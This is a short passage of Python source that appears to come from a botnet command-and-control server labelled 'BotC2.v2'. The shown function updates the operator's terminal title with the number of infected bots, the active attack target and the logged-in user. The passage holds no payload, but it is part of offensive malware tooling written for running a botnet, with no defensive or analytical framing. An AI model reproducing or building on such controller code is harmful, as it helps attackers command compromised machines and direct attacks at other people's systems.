(client,name)
| 229 | |
| 230 | # Updates Shell Title |
| 231 | def update_title(client,name): |
| 232 | global send_attack_target |
| 233 | try: |
| 234 | send(client, f'\33]0; PUTTY SERVICE | BotC2.v2 - [ Infect {len(bots)} | Attack-ALL {send_attack_target} | Login {name} ] - - - [>_] WELCOME [>_]\a', False) |
| 235 | time.sleep(2) |
| 236 | except: |
| 237 | client.close() |
| 238 | |
| 239 | color_random = f'\x1b[38;5;{randint(0,255)}m' |
| 240 |